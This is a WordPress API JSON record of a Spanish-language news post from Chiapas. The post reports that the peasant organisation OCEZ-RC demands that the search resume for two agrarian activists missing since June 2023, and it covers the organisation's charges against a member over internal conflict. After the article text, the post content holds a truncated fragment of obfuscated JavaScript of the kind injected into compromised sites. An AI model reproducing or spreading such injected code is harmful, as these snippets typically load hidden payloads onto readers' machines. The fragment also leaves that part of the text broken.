{"id":20109,"date":"2025-01-31T03:50:09","date_gmt":"2025-01-31T03:50:09","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=20109"},"modified":"2025-01-31T03:50:09","modified_gmt":"2025-01-31T03:50:09","slug":"exigen-justicia-por-desaparicion-de-activistas-en-chiapas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=20109","title":{"rendered":"Exigen justicia por desaparici\u00f3n de activistas en Chiapas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250130-WA0019-1024x576.jpg\" alt=\"\" class=\"wp-image-20110\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250130-WA0019-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250130-WA0019-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250130-WA0019-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250130-WA0019-1536x864.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250130-WA0019.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Yolanda Rodr\u00edguez\/ Corresponsal<br>30 de enero del 2025. San Crist\u00f3bal de Las Casas.- Integrantes de la Organizaci\u00f3n Campesina Emiliano Zapata, Regi\u00f3n Carranza (OCEZ-RC), exigieron la reactivaci\u00f3n de la b\u00fasqueda y el esclarecimiento de la desaparici\u00f3n de Urbela\u00edn Aguilar de la Cruz y Marco Antonio D\u00edaz G\u00f3mez, quienes fueron vistos por \u00faltima vez el 26 de junio de 2023.<\/p>\n\n\n\n<p>En una conferencia de prensa realizada en la Catedral de esta ciudad, Ricardo Magdaleno Velasco y Francisco Aguilar Alfonso, representantes de la organizaci\u00f3n, denunciaron que la administraci\u00f3n estatal anterior no mostr\u00f3 inter\u00e9s en localizar a los activistas, quienes ya llevan 18 meses desaparecidos.<\/p>\n\n\n\n<p>Seg\u00fan los voceros de la OCEZ-RC, en los primeros 40 d\u00edas despu\u00e9s de la desaparici\u00f3n de Aguilar de la Cruz y D\u00edaz G\u00f3mez se llevaron a cabo algunas acciones de b\u00fasqueda, pero luego las investigaciones fueron abandonadas. &#8220;Pedimos a la Fiscal\u00eda General del Estado que reabra la carpeta de investigaci\u00f3n y que se indague a fondo el caso. &#8220;Queremos saber si nuestros compa\u00f1eros est\u00e1n vivos o muertos y que se haga justicia contra los responsables&#8221;, se\u00f1al\u00f3.<\/p>\n\n\n\n<p>Los activistas desaparecidos se dedicaban a la lucha agraria y hab\u00edan logrado la recuperaci\u00f3n de aproximadamente 250 hect\u00e1reas en el municipio de Venustiano Carranza, beneficiando a 80 familias. Los representantes de la organizaci\u00f3n informaron que el actual gobierno estatal se comprometi\u00f3 a instalar una mesa de di\u00e1logo para atender el caso, por lo que esperan ser convocados en los pr\u00f3ximos d\u00edas.<\/p>\n\n\n\n<p>Durante la conferencia, tambi\u00e9n se\u00f1alaron las divisiones internas dentro de la OCEZ-RC, acusando a Jos\u00e9 Manuel Hern\u00e1ndez Mart\u00ednez, alias &#8220;Chema&#8221;, de anteponer intereses personales sobre los colectivos. Aseguraron que Hern\u00e1ndez Mart\u00ednez ha promovido conflictos internos mediante difamaciones, se\u00f1alamientos y amenazas, lo que ha generado enfrentamientos entre los propios integrantes de la organizaci\u00f3n.<\/p>\n\n\n\n<p>&#8220;Esta situaci\u00f3n ha originado la fragmentaci\u00f3n de la organizaci\u00f3n en tres grupos: las comunidades de Santa Cruz, Grupo Nuevo, San Jos\u00e9 y Candelaria Uno. Estos grupos han saboteado sistem\u00e1ticamente nuestras actividades, violando los principios fundamentales y los reglamentos internos de la organizaci\u00f3n&#8221;, denunciaron.<\/p>\n\n\n\n<p>Finalmente, los representantes de la OCEZ-RC se deslindaron de cualquier acto de violencia que pudiera registrarse y responsabilizaron a Hern\u00e1ndez Mart\u00ednez de los posibles conflictos derivados de esta situaci\u00f3n.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Yolanda Rodr\u00edguez\/ Corresponsal30 de enero del 2025. San Crist\u00f3bal de Las Casas.- Integrantes de la Organizaci\u00f3n Campesina Emiliano Zapata, Regi\u00f3n Carranza (OCEZ-RC), exigieron la reactivaci\u00f3n de la b\u00fasqueda y el esclarecimiento de la desaparici\u00f3n de Urbela\u00edn Aguilar de la Cruz y Marco Antonio D\u00edaz G\u00f3mez, quienes fueron vistos por \u00faltima vez el 26 de junio &hellip;<\/p>\n","protected":false},"author":2,"featured_media":20110,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-20109","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20109","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20109"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20109\/revisions"}],"predecessor-version":[{"id":20111,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20109\/revisions\/20111"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/20110"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20109"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20109"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20109"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}